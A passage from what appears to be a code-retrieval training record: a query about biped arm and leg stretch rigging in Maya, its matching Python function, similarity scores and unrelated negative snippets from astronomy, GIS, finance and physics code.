region.get_data(column=\"energy\").tolist()\n\n if by_min:\n counts_min = min(counts)\n counts_min_index = counts.index(counts_min)\n # If minimum lies closer to the right side of the region\n if counts_min_index > len(energy) // 2:\n background = calculate_line(\"right\")\n else:\n background = calculate_line(\"left\")\n else:\n if manual_bg:\n line_end_values = calculate_manual_bg(energy, counts, manual_bg)\n background = np.linspace(line_end_values[0], line_end_values[1], len(energy))\n else:\n background = np.linspace(counts[0], counts[-1], len(energy))\n\n if add_column:\n region.add_column(\"no_lin_bg\", counts - background, overwrite=overwrite)\n\n return background", "def contrast_curve_core(\n star_data,\n plate_scale,\n fwhm=1,\n radius_size=None,\n center=None,\n):\n\n # make copy of data array\n data = star_data.copy()\n\n# data = np.abs(data) #DO NOT DO THIS!!!! It's making the standard deviation too small later.\n\n ################## establish center ########\n\n x, y = np.indices((data.shape))\n\n if type(center) == type(None):\n center = np.array(\n [(x.max() - x.min()) / 2.0, (y.max() - y.min()) / 2.0]\n )\n\n if type(radius_size) == type(None):\n radius_size = fwhm\n\n ########## set up radial coordinate system ########\n\n radii = np.sqrt((x - center[0]) ** 2 + (y - center[1]) ** 2)\n radii = radii.astype(np.int64)\n\n ones = np.ones_like(data)\n\n number_of_a = int(radii.max() / radius_size)\n\n pie_edges = np.arange(0, 390, 30)\n\n ######## set up aperture array ##########\n center_ap = CircularAperture([center[0], center[1]], radius_size)\n\n all_apers, all_apers_areas, all_masks = (\n [center_ap],\n [center_ap.area],\n [center_ap.to_mask(method=\"exact\")],\n )\n\n all_data, all_weights = [all_masks[0].multiply(data)], [\n all_masks[0].multiply(ones)\n ]\n\n all_stds = [twoD_weighted_std(all_data[0], all_weights[0])]\n\n ######## construct the apertures of the annuli #######\n sigma_clip = SigmaClip(sigma=3.0)\n bkgrms = StdBackgroundRMS(sigma_clip)\n\n medians = np.zeros((number_of_a, len(pie_edges) - 1))\n stds = np.zeros((number_of_a, len(pie_edges) - 1))\n seps = np.zeros(number_of_a)\n for j in range(int(number_of_a)):\n r_in = j * radius_size + fwhm\n r_out = j * radius_size + radius_size + fwhm\n seps[j] = (r_in+r_out)/2.*plate_scale\n\n # terminate if completely outside 10 arcseconds\n if (r_in * plate_scale) > 10:\n break\n\n # create aperture\n aper = CircularAnnulus(\n [center[0], center[1]],\n r_in=r_in,\n r_out=r_out,\n )\n\n # multiply the data by the aperture mask and store it\n all_apers.append(aper)\n all_apers_areas.append(aper.area)\n mask = aper.to_mask(method=\"exact\")\n all_masks.append(mask)\n mask_data = mask.multiply(data)\n\n mask_weight = mask.multiply(ones)\n\n for i, pie_edge_near in enumerate(pie_edges[:-1]):\n pie_edge_far = pie_edges[i + 1]\n mask_data_new = mask_data.copy()\n mask_data_new = check_boundaries(\n mask_data_new, pie_edge_near, pie_edge_far\n )\n medians[j, i] = np.nanmedian(mask_data_new)\n mask_data_masked = mask_data_new[~np.isnan(mask_data_new)]\n\n mean, std = meanclip(mask_data_masked, 3, converge_num=0.2)\n stds[j, i] = std\n\n #Return only the medians and stds for distances within the desired range\n seps = seps[0:j]\n medians = medians[0:j,:]\n stds = stds[0:j,:]\n return seps, medians, stds", "def inverted_hammer(self):\n self.data['inverted_hammer'] = (((self.data['High'] - self.data['Low']) > ((self.data['Open'] - self.data['Close'])*3)) & \\\n ((self.data['High'] - self.data['Close']) / ((.001 + self.data['High'] - self.data['Low']) > 0.6)) & \\\n ((self.data['High'] - self.data['Open']) / ((.001 + self.data['High'] - self.data['Low']) > 0.6)))", "def __init__(self, trap=2.5*10**16, Keq=1.0*10**17,\n EHdecay=1.0*10**-10, Etrap=2.0*10**-10, FHloss=8.0*10**-12,\n G3decay = 0, step=200*ps, pretime=2, reprate=80000000,\n verbose=False, trackQ=False, scalar=1, Gdecay=0, GHdecay=0,\n tolerance=0.005, G2decay=0. ,Gescape=1., Gform=1., G3loss=0.):\n # Some other variables used\n self.tolerance = tolerance\n self.scalar = scalar\n self.verbose = verbose\n self.reprate = reprate\n self.duration = 1.00 / reprate\n self.step = step\n self.steps = int(self.duration / self.step)\n self.powers = []\n self.pretime = pretime\n # Variables which hold state densities\n self.exciton = []\n self.hole = []\n self.electron = []\n self.trap = (trap) # Total number of traps\n self.filled = [] # Filled traps\n self.signal = []\n self.xsignal = []\n self.ehsignal = []\n self.xloss = []\n self.tloss = []\n self.pulses = []\n self.qk = []\n self.trackQ = trackQ\n # Rate and equilibrium constants, corrected for time step size\n self.Keq = Gescape/Gform # Equilibrium constant for X<-->e+h\n self.EHdecay = (EHdecay * step) # e+h->ground\n self.Etrap = (Etrap * step) # e+trap->filled\n self.FHloss = (FHloss * step) # filled+h->ground\n self.Gdecay = Gdecay * step\n self.G2decay = G2decay * step\n self.G3decay = G3decay * step\n self.GHdecay = GHdecay * step\n self.Gescape = Gescape * step\n self.G3loss = G3loss * step\n self.Gform = Gform * step", "def gripStretchQgsLineStringGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n obj = qad_utils.whatGeomIs(0, geom)\n if (type(obj) != list and type(obj) != tuple):\n objType = obj.whatIs()\n if objType == \"CIRCLE\": # se é cerchio\n newCircle = gripStretchCircle(obj, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newCircle is not None:\n return QgsGeometry.fromPolyline(newCircle.asPolyline(tolerance2ApproxCurve))\n elif objType == \"ARC\": # se é arco\n newArc = gripStretchArc(obj, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newArc is not None:\n return QgsGeometry.fromPolyline(newArc.asPolyline(tolerance2ApproxCurve))\n return None\n \n linearObjectListToStretch = qad_utils.QadLinearObjectList()\n linearObjectListToStretch.fromPolyline(geom.asPolyline())\n \n atPart = 0\n while atPart < linearObjectListToStretch.qty():\n linearObject = linearObjectListToStretch.getLinearObjectAt(atPart) \n if linearObject.isSegment():\n pt = linearObject.getStartPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto iniziale \n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setStartPt(pt)\n \n pt = linearObject.getEndPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto finale\n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setEndPt(pt)\n else: # se è arco\n newArc, newInverseFlag = gripStretchArc(linearObject.getArc(), ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, linearObject.isInverseArc())\n if newArc is None:\n return None\n linearObject.setArc(newArc, newInverseFlag)\n\n atPart = atPart + 1\n \n pt = linearObjectListToStretch.getCentroid(tolerance2ApproxCurve) # verifico se polilinea ha un centroide\n if pt is not None:\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n linearObjectListToStretch.move(offSetX, offSetY)\n \n pts = linearObjectListToStretch.asPolyline(tolerance2ApproxCurve)\n stretchedGeom = QgsGeometry.fromPolyline(pts) \n \n return stretchedGeom", "def build_schematic(self, bg=None):", "def hdmatrix(self):\n hdmat = np.zeros((len(self.pulsars), len(self.pulsars)))\n\n for i,pulsar1 in enumerate(self.pulsars):\n for j,pulsar2 in enumerate(self.pulsars):\n hdmat[i,j] = hellingsdowns_factor(pulsar1, pulsar2)\n self.hdm = hdmat\n return hdmat", "def feet_of_ribbon(d):\n a, b = shortest_two_sides(d)\n return a+a+b+b + d.l * d.w * d.h", "def build_fireball():\n # build the right part\n build_rightpart()\n\n # copy it to 4.\n copy(0, 4)\n\n # build the left part, now it's in 0\n build_leftpart()\n\n # copy right part from 4 to 1.\n copy(4, 1)\n # smash together for whole fireball.\n smash()", "def illuminator_of_elfes():\n\n\t# Alpha - simplified by taking out the i by multiplying the outerproduct by 2i\n\talpha1i = np.matrix([[0, 0, 0, 2], [0, 0, 2, 0], [0, -2, 0, 0], [-2, 0, 0, 0]])\n\talpha2i = np.matrix([[0, 2, 0, 0], [-2, 0, 0, 0], [0, 0, 0, 2], [0, 0, -2, 0]])\n\talpha3i = np.matrix([[0, 0, 2, 0], [0, 0, 0, -2], [-2, 0, 0, 0], [0, 2, 0, 0]])\n\n\t# Betas - simplified by taking out the i by multiplication of outerprod by 2i\n\tbeta1i = np.matrix([[0, 0, 0, 2], [0, 0, -2, 0], [0, 2, 0, 0], [-2, 0, 0, 0]])\n\tbeta2i = np.matrix([[0, 0, 2, 0], [0, 0, 0, 2], [-2, 0, 0, 0], [0, -2, 0, 0]])\n\tbeta3i = np.matrix([[0, 2, 0, 0], [-2, 0, 0, 0], [0, 0, 0, -2], [0, 0, 2, 0]])\n\n\t# print(\"alpha 1\")\n\t# print(alpha1i)\n\t# print(\"\")\n\t# print(\"alpha 2\")\n\t# print(alpha2i)\n\t# print(\"\")\n\t# print(\"alpha 3\")\n\t# print(alpha3i)\n\t# print(\"\")\n\t# print(\"beta 1\")\n\t# print(beta1i)\n\t# print(\"\")\n\t# print(\"beta 2\")\n\t# print(beta2i)\n\t# print(\"\")\n\t# print(\"beta 3\")\n\t# print(beta3i)\n\t# print(\"\")\n\n\t# abperm_comb = [ np.multiply(alpha1i,-1), np.multiply(alpha2i,-1), np.multiply(alpha3i,-1), np.multiply(beta1i,-1), np.multiply(beta2i,-1), np.multiply(beta3i,-1)]\n\n\tabperm_comb = [alpha1i, alpha2i, alpha3i, beta1i, beta2i, beta3i]\n\treturn abperm_comb" ]
[ "0.5521156", "0.52241683", "0.52145356", "0.51717967", "0.5153184", "0.5151809", "0.5132688", "0.5117285", "0.5094757", "0.50800526", "0.5053586", "0.5023979", "0.5008975", "0.50081855", "0.50077236", "0.5004814", "0.49971503", "0.49883208", "0.49845037", "0.49832925", "0.49721703", "0.49566323", "0.4947242", "0.49403057", "0.49342614", "0.49260688", "0.4925075", "0.4924976", "0.49185863", "0.4915794", "0.4912294", "0.49106312", "0.49102575", "0.49069765", "0.490615", "0.4900228", "0.48872647", "0.4885267", "0.48806837", "0.48673055", "0.48658955", "0.4853624", "0.4847098", "0.48439476", "0.48383307", "0.4836354", "0.48359242", "0.48259982", "0.4819269", "0.4814695", "0.4813266", "0.4809128", "0.48053157", "0.48041898", "0.48035708", "0.48012656", "0.48003897", "0.47979215", "0.47975853", "0.4796583", "0.47929555", "0.4790556", "0.4783082", "0.4783069", "0.47640544", "0.47635418", "0.47626352", "0.4760194", "0.4759924", "0.47549647", "0.4752874", "0.4749555", "0.47490725", "0.4747741", "0.4747493", "0.4746359", "0.4746213", "0.47443298", "0.47381848", "0.47360712", "0.47355828", "0.47336796", "0.47336692", "0.47324494", "0.47318545", "0.47283006", "0.47268206", "0.4722404", "0.4718064", "0.47160137", "0.47132134", "0.4712598", "0.47116563", "0.47110346", "0.4705596", "0.47046986", "0.47016972", "0.47015166", "0.46988592", "0.46978125", "0.46954596" ]
0.0
-1
Stretch setup for biped (2 joint chain) arms and legs
def biped_stretch(ik_ctrl, ik_last_node, pv_ctrl, switch_ctrl, up_arm_fk_ctrl, lo_arm_fk_ctrl, wrist_fk_ctrl, up_arm_ik_jnt, lo_arm_ik_jnt, wrist_ik_jnt, ik_handle, pin_attr_name='pinElbow', shift_attr_name='shiftElbow'): # add all my attrs on ctrls mc.addAttr(ik_ctrl, ln=pin_attr_name, at='double', min=0, max=1, k=1) mc.addAttr(ik_ctrl, ln=shift_attr_name, at='double', min=-1, max=1, k=1) mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1) mc.addAttr(ik_ctrl, ln='upStretch', at='double', dv=1, min=0.001, k=1) mc.addAttr(ik_ctrl, ln='loStretch', at='double', dv=1, min=0.001, k=1) mc.addAttr(up_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1) mc.addAttr(lo_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1) # store initial length of joint lo_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx') wrist_init_length = mc.getAttr(wrist_ik_jnt+'.tx') max_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')+mc.getAttr(wrist_ik_jnt+'.tx') lo_abs_init_length = abs(mc.getAttr(lo_arm_ik_jnt+'.tx')) wrist_abs_length = abs(mc.getAttr(wrist_ik_jnt+'.tx')) # Get parents for ik handle and root of the parm arm_root_grp = utils.get_parent(up_arm_ik_jnt) # Create distance nodes between base, end, and pv ctrl to get the length of side of the triangle root_to_end_dist = utils.create_distance_reader(arm_root_grp, ik_last_node) root_to_pv_dist = utils.create_distance_reader(arm_root_grp, pv_ctrl) pv_to_end_dist = utils.create_distance_reader(pv_ctrl, ik_last_node) # easy stuff first - create fk stretch nodes lo_arm_fk_mdl = mc.createNode('multDoubleLinear') wrist_fk_mdl = mc.createNode('multDoubleLinear') mc.setAttr(lo_arm_fk_mdl+'.input1', mc.getAttr(lo_arm_ik_jnt+'.tx')) mc.setAttr(wrist_fk_mdl+'.input1', mc.getAttr(wrist_ik_jnt+'.tx')) mc.connectAttr(up_arm_fk_ctrl+'.stretch', lo_arm_fk_mdl+'.input2') mc.connectAttr(lo_arm_fk_ctrl+'.stretch', wrist_fk_mdl+'.input2') utils.connect_abs(lo_arm_fk_mdl+'.output', lo_arm_fk_ctrl+'_ZERO.tx') if wrist_fk_ctrl and mc.objExists(wrist_fk_ctrl): utils.connect_abs(wrist_fk_mdl+'.output', wrist_fk_ctrl+'_ZERO.tx') # These arethe final fk stretch outputs to connect to joints fk_stretch_final_output = [lo_arm_fk_mdl+'.output', wrist_fk_mdl+'.output'] # NOW creates node s for thew elbow pin lo_arm_pin_mdl = mc.createNode('multDoubleLinear') wrist_pin_mdl = mc.createNode('multDoubleLinear') mc.setAttr(lo_arm_pin_mdl+'.input1', 1) mc.setAttr(wrist_pin_mdl+'.input1', 1) if lo_init_length < 0.0: mc.setAttr(lo_arm_pin_mdl+'.input1', -1) if wrist_init_length < 0.0: mc.setAttr(wrist_pin_mdl+'.input1', -1) mc.connectAttr(root_to_pv_dist+'.localDistance', lo_arm_pin_mdl+'.input2') mc.connectAttr(pv_to_end_dist+'.localDistance', wrist_pin_mdl+'.input2') # These arethe final elbow pin stretch outputs to connect to joints pin_final_output = [lo_arm_pin_mdl+'.output', wrist_pin_mdl+'.output'] # create shift nodes mc.addAttr(lo_arm_ik_jnt, ln='shiftLength', k=1) mc.addAttr(wrist_ik_jnt, ln='shiftLength', k=1) tt = 'linear' mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=lo_init_length, itt=tt, ott=tt) mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=0, itt=tt, ott=tt) mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=max_init_length, itt=tt, ott=tt) mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=wrist_init_length, itt=tt, ott=tt) mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=max_init_length, itt=tt, ott=tt) mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=0, itt=tt, ott=tt) shift_final_output = [ lo_arm_ik_jnt+'.shiftLength', wrist_ik_jnt+'.shiftLength'] # Create ik indivisual stretch nodes lo_arm_ik_scale_mdl = mc.createNode('multDoubleLinear') wrist_ik_scale_mdl = mc.createNode('multDoubleLinear') mc.connectAttr(shift_final_output[0], lo_arm_ik_scale_mdl+'.input1') mc.connectAttr(shift_final_output[1], wrist_ik_scale_mdl+'.input1') mc.connectAttr(ik_ctrl+'.upStretch', lo_arm_ik_scale_mdl+'.input2') mc.connectAttr(ik_ctrl+'.loStretch', wrist_ik_scale_mdl+'.input2') # This is the final output for scale and shift ik_stretch_final_output = [lo_arm_ik_scale_mdl+'.output', wrist_ik_scale_mdl+'.output'] # Now create the IK auto stretch nodes lo_auto_stretch_mdl = mc.createNode('multDoubleLinear') wrist_auto_stretch_mdl = mc.createNode('multDoubleLinear') auto_stretch_clamp = mc.createNode('clamp') mc.setAttr(auto_stretch_clamp+'.minR', 1) mc.setAttr(auto_stretch_clamp+'.maxR', 10000000) mc.connectAttr(ik_stretch_final_output[0], lo_auto_stretch_mdl+'.input1', f=1) mc.connectAttr(ik_stretch_final_output[1], wrist_auto_stretch_mdl+'.input1', f=1) mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR') mc.connectAttr(auto_stretch_clamp+'.outputR', lo_auto_stretch_mdl+'.input2', f=1) mc.connectAttr(auto_stretch_clamp+'.outputR', wrist_auto_stretch_mdl+'.input2', f=1) adl = mc.createNode('addDoubleLinear') mc.connectAttr(lo_arm_ik_scale_mdl+'.output', adl+'.input1') mc.connectAttr(wrist_ik_scale_mdl+'.output', adl+'.input2') utils.connect_abs(adl+'.output', root_to_end_dist+'.jointChainLength') # handle soft ik handle constraint override pc = mc.pointConstraint(ik_last_node, ik_handle)[0] if mc.objExists(up_arm_ik_jnt+'.softIkChainLength'): # compensate feed in new chain length for soft ik chain length utils.connect_abs(adl+'.output', up_arm_ik_jnt+'.softIkChainLength') # blend off the soft ik constraint IF im in auto s tretch or pin mode mdl = mc.createNode('multDoubleLinear') utils.connect_reverse(ik_ctrl+'.'+pin_attr_name, mdl+'.input1') utils.connect_reverse(ik_ctrl+'.autoStretch', mdl+'.input2') mc.connectAttr(mdl+'.output', pc+'.w0') utils.connect_reverse(pc+'.w0', pc+'.w1') ik_auto_stretch_final_output = [lo_auto_stretch_mdl+'.output', wrist_auto_stretch_mdl+'.output'] # now create all my blends # first blend btween FK and an empty ik input # (this ikl input will take another blend node for blending oall the IK options ) fk_to_ik_blend = mc.createNode('blendColors') mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.blender') mc.connectAttr(fk_stretch_final_output[0], fk_to_ik_blend+'.color2R') mc.connectAttr(fk_stretch_final_output[1], fk_to_ik_blend+'.color2G') # now create a blender between pin elbow and the rest of the ik options auto_ik_blend = mc.createNode('blendColors') mc.connectAttr(ik_ctrl+'.autoStretch', auto_ik_blend+'.blender') mc.connectAttr(ik_auto_stretch_final_output[0], auto_ik_blend+'.color1R') mc.connectAttr(ik_auto_stretch_final_output[1], auto_ik_blend+'.color1G') # Now connect it toth fk blend mc.connectAttr(auto_ik_blend+'.outputR', fk_to_ik_blend+'.color1R') mc.connectAttr(auto_ik_blend+'.outputG', fk_to_ik_blend+'.color1G') # now create a blender between pin elbow and the rest of the ik options pin_ik_blend = mc.createNode('blendColors') mc.connectAttr(ik_ctrl+'.'+pin_attr_name, pin_ik_blend+'.blender') mc.connectAttr(pin_final_output[0], pin_ik_blend+'.color1R') mc.connectAttr(pin_final_output[1], pin_ik_blend+'.color1G') # Now connect it toth fk blend mc.connectAttr(pin_ik_blend+'.outputR', auto_ik_blend+'.color2R') mc.connectAttr(pin_ik_blend+'.outputG', auto_ik_blend+'.color2G') # now connect the shift and scale mc.connectAttr(ik_stretch_final_output[0], pin_ik_blend+'.color2R') mc.connectAttr(ik_stretch_final_output[1], pin_ik_blend+'.color2G') # now for the magic! Connect the blend networll to joints mc.connectAttr(fk_to_ik_blend+'.outputR', lo_arm_ik_jnt+'.tx') mc.connectAttr(fk_to_ik_blend+'.outputG', wrist_ik_jnt+'.tx')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def multi_joint_stretch(ik_ctrl, ik_last_node, switch_ctrl, fk_ctrls, jnts, ik_handle):\n\n root_grp = utils.get_parent(jnts[0])\n stretch_jnts = jnts[1:]\n stretch_fk_ctrls = fk_ctrls[1:]\n\n # create attrs\n attrs = ['upStretch','loStretch']\n for i in reversed(range(len(stretch_jnts)-2)):\n ltr = ''\n if i > 0:\n ltr = utils.letters[i]\n\n attrs.insert(1, 'midStretch'+ltr)\n\n if not mc.objExists(ik_ctrl+'.autoStretch'):\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n\n for i in range(len(stretch_jnts)):\n if not mc.objExists(ik_ctrl+'.'+attrs[i]):\n mc.addAttr(ik_ctrl, ln=attrs[i], at='double', dv=1, min=0.001, k=1)\n\n for fk_ctrl in fk_ctrls[:-1]:\n if not mc.objExists(fk_ctrl+'.stretch'):\n mc.addAttr(fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n init_lengths = [mc.getAttr(j+'.tx') for j in stretch_jnts]\n abs_init_lengths = [abs(v) for v in init_lengths]\n\n total_init_length = 0\n for v in init_lengths:\n total_init_length += v\n\n abs_total_init_length = abs(total_init_length)\n\n # Create dist reader\n root_to_end_dist = utils.create_distance_reader(root_grp, ik_last_node)\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.addAttr(ik_ctrl, ln='stretchFactor', k=0)\n mc.connectAttr(auto_stretch_clamp+'.inputR', ik_ctrl+'.stretchFactor')\n\n pma = mc.createNode('plusMinusAverage')\n utils.connect_abs(pma+'.output1D', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(jnts[0]+'.softIkChainLength'):\n\n # compensate chain length - feed in new chain length for soft ik chain length\n utils.connect_abs(pma+'.output1D', jnts[0]+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto stretch\n mc.connectAttr(ik_ctrl+'.autoStretch', pc+'.w1')\n utils.connect_reverse(pc+'.w1', pc+'.w0')\n\n # easy stuff first - create fk stretch nodes\n fk_to_ik_blends = [] # This is the final output for IK stretch\n\n for i, jnt in enumerate(stretch_jnts):\n\n # easy stuff first - create fk stretch nodes\n fk_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr(fk_mdl+'.input1', mc.getAttr(jnt+'.tx'))\n mc.connectAttr(fk_ctrls[i]+'.stretch', fk_mdl+'.input2')\n utils.connect_abs(fk_mdl+'.output', fk_ctrls[i+1]+'_ZERO.tx')\n\n # Create user secifed IK stretch\n user_ik_scale_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr( user_ik_scale_mdl+'.input1', init_lengths[i])\n mc.connectAttr(ik_ctrl+'.'+attrs[i], user_ik_scale_mdl+'.input2')\n\n # Now create the IK auto stretch nodes\n auto_stretch_mdl = mc.createNode('multDoubleLinear')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(user_ik_scale_mdl+'.output', '{0}.input1D[{1}]'.format(pma, i))\n\n fk_to_ik_blend = mc.createNode('blendTwoAttr')\n auto_stretch_blend = mc.createNode('blendTwoAttr')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.attributesBlender')\n mc.connectAttr(fk_mdl+'.output', fk_to_ik_blend+'.input[0]')\n mc.connectAttr(auto_stretch_blend+'.output', fk_to_ik_blend+'.input[1]')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_stretch_blend+'.attributesBlender')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_blend+'.input[0]')\n mc.connectAttr(auto_stretch_mdl+'.output', auto_stretch_blend+'.input[1]')\n\n fk_to_ik_blends.append(fk_to_ik_blend+'.output')\n\n for i, jnt in enumerate(stretch_jnts):\n mc.connectAttr(fk_to_ik_blends[i], jnt+'.tx')", "def ar_addStretchSquash():\n setupName = 'Nose'\n sel = cmds.ls(sl=True)\n chain = cmds.ls(sel[0], dag=True, typ='joint')\n IKSpine = cmds.ikHandle(sj=chain[0], ee=chain[len(chain) - 1], sol='ikSplineSolver')\n # rename\n cmds.rename(IKSpine[0], 'IKSplineHandle_' + setupName)\n cmds.rename(IKSpine[1], 'IKSplineEff_' + setupName)\n cmds.rename(IKSpine[2], 'IKSplineCurve_' + setupName)\n # create new joints.\n cmds.select(cl=True)\n bindStartJt = cmds.joint(n='JtCrvBind01')\n cmds.select(cl=True)\n bindEndJt = cmds.joint(n='JtCrvBind02')\n cmds.delete(cmds.parentConstraint(chain[0], bindStartJt))\n cmds.delete(cmds.parentConstraint(chain[len(chain) - 1], bindEndJt))\n\n cmds.skinCluster(bindStartJt, bindEndJt, 'IKSplineCurve_' + setupName, bm=0, sm=0, nw=1, wd=0, mi=2)\n ctlStart = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '01_CTRL', ch=False)\n extraGrp = cmds.createNode('transform', n='Toony' + setupName + '01ExtraGrp')\n offGrp = cmds.createNode('transform', n='Toony' + setupName + '01OffsetGrp')\n cmds.parent(ctlStart[0], extraGrp)\n cmds.parent(extraGrp, offGrp)\n cmds.delete(cmds.parentConstraint(bindStartJt, offGrp))\n # endJOint\n ctlEnd = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '02_CTRL', ch=False)\n extraGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02ExtraGrp')\n offGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02OffsetGrp')\n cmds.parent(ctlEnd[0], extraGrpEnd)\n cmds.parent(extraGrpEnd, offGrpEnd)\n cmds.delete(cmds.parentConstraint(bindEndJt, offGrpEnd))\n # parent constraint wiht bind joints.\n cmds.parentConstraint(ctlStart[0], bindStartJt)\n cmds.parentConstraint(ctlEnd[0], bindEndJt)\n # Create connection with node basis.\n crvInfo = cmds.createNode('curveInfo', n='curveInfo_Toony' + setupName)\n shpCrv = cmds.listRelatives('IKSplineCurve_' + setupName, s=True)\n cmds.connectAttr(shpCrv[0] + '.worldSpace[0]', crvInfo + '.inputCurve', f=True)\n mdnForSX = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleX')\n mdnForPW = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_Power')\n mdnForYZ = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleYZ')\n cmds.setAttr(mdnForSX + '.operation', 2)\n cmds.setAttr(mdnForPW + '.operation', 3)\n cmds.setAttr(mdnForYZ + '.operation', 2)\n # connections.\n cmds.connectAttr(crvInfo + '.arcLength', mdnForSX + '.input1X', f=True)\n cmds.setAttr(mdnForSX + '.input2X', cmds.getAttr(mdnForSX + '.input1X'))\n scaledJoint = chain[:-1]\n for each in scaledJoint:\n cmds.connectAttr(mdnForSX + '.outputX', each + '.sx', f=True)\n # power connections.\n cmds.connectAttr(mdnForSX + '.outputX', mdnForPW + '.input1X', f=True)\n cmds.setAttr(mdnForPW + '.input2X', 0.5)\n cmds.connectAttr(mdnForPW + '.outputX', mdnForYZ + '.input2X', f=True)\n cmds.setAttr(mdnForYZ + '.input1X', 1)\n for each in scaledJoint:\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sy')\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sz')\n # TODO: need to full proof this function.", "def gripStretchQgsLineStringGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n obj = qad_utils.whatGeomIs(0, geom)\n if (type(obj) != list and type(obj) != tuple):\n objType = obj.whatIs()\n if objType == \"CIRCLE\": # se é cerchio\n newCircle = gripStretchCircle(obj, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newCircle is not None:\n return QgsGeometry.fromPolyline(newCircle.asPolyline(tolerance2ApproxCurve))\n elif objType == \"ARC\": # se é arco\n newArc = gripStretchArc(obj, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newArc is not None:\n return QgsGeometry.fromPolyline(newArc.asPolyline(tolerance2ApproxCurve))\n return None\n \n linearObjectListToStretch = qad_utils.QadLinearObjectList()\n linearObjectListToStretch.fromPolyline(geom.asPolyline())\n \n atPart = 0\n while atPart < linearObjectListToStretch.qty():\n linearObject = linearObjectListToStretch.getLinearObjectAt(atPart) \n if linearObject.isSegment():\n pt = linearObject.getStartPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto iniziale \n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setStartPt(pt)\n \n pt = linearObject.getEndPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto finale\n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setEndPt(pt)\n else: # se è arco\n newArc, newInverseFlag = gripStretchArc(linearObject.getArc(), ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, linearObject.isInverseArc())\n if newArc is None:\n return None\n linearObject.setArc(newArc, newInverseFlag)\n\n atPart = atPart + 1\n \n pt = linearObjectListToStretch.getCentroid(tolerance2ApproxCurve) # verifico se polilinea ha un centroide\n if pt is not None:\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n linearObjectListToStretch.move(offSetX, offSetY)\n \n pts = linearObjectListToStretch.asPolyline(tolerance2ApproxCurve)\n stretchedGeom = QgsGeometry.fromPolyline(pts) \n \n return stretchedGeom", "def route_bitlines(self):\n # adds the BL on metal 2\n offset = vector(self.bitcell.get_pin(self.bitcell_bl).cx(),0) - vector(0.5 * self.m2_width,0)\n self.add_layout_pin(text=\"bl\",\n layer=\"metal2\",\n offset=offset,\n width=drc['minwidth_metal2'],\n 